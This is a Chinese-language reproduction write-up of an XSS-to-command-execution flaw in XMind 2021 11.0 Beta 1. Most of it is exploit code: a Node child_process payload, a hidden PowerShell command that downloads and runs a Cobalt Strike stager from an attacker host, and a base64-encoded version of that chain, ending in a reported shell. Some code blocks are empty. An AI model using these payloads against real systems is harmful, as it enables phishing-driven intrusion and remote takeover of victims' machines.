# XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行
## 漏洞描述
Xmind 2020存在XSS漏洞,攻击者可以借助该漏洞实现命令执行,在实际环境中借助钓鱼攻击可能造成更严重的危害。
## 漏洞影响
> xmind 2021 11.0 Beta 1
## 漏洞利用方式
> 选择事件型XSS需要附带onerror事件,比如img、audio等
## 漏洞复现
弹窗代码:
“`
“`
构造命令执行payload:
“`
require(‘child_process’).exec(‘ipconfig /all’,(error, stdout, stderr)=>{
alert(`stdout: ${stdout}`);
});
“`
最终利用代码:
“`
“`
![1](/static/qingy/XMind_2021_11.0_Beta_1_XSS漏洞导致命令执行/img/1.png)
![2](/static/qingy/XMind_2021_11.0_Beta_1_XSS漏洞导致命令执行/img/2.png)
![3](/static/qingy/XMind_2021_11.0_Beta_1_XSS漏洞导致命令执行/img/3.png)
##反弹shell
CS生成powershell脚本
![4](/static/qingy/XMind_2021_11.0_Beta_1_XSS漏洞导致命令执行/img/4.png)
编写命令:
“`
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://IP:端口/abcde’))”
require(‘child_process’).exec(‘powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(\’http://IP:端口/abcde\’))”‘,(error, stdout, stderr)=>{
alert(`stdout: ${stdout}`);
});
cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3Bvd2Vyc2hlbGwuZXhlIC1ub3AgLXcgaGlkZGVuIC1jICJJRVggKChuZXctb2JqZWN0IG5ldC53ZWJjbGllbnQpLmRvd25sb2Fkc3RyaW5nKFwnaHR0cDovLzE5Mi4xNjguNzIuMTI5OjgwODEvYWJjZGVcJykpIicsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==
“`
成功上线
![5](/static/qingy/XMind_2021_11.0_Beta_1_XSS漏洞导致命令执行/img/5.png)
请登录后查看评论内容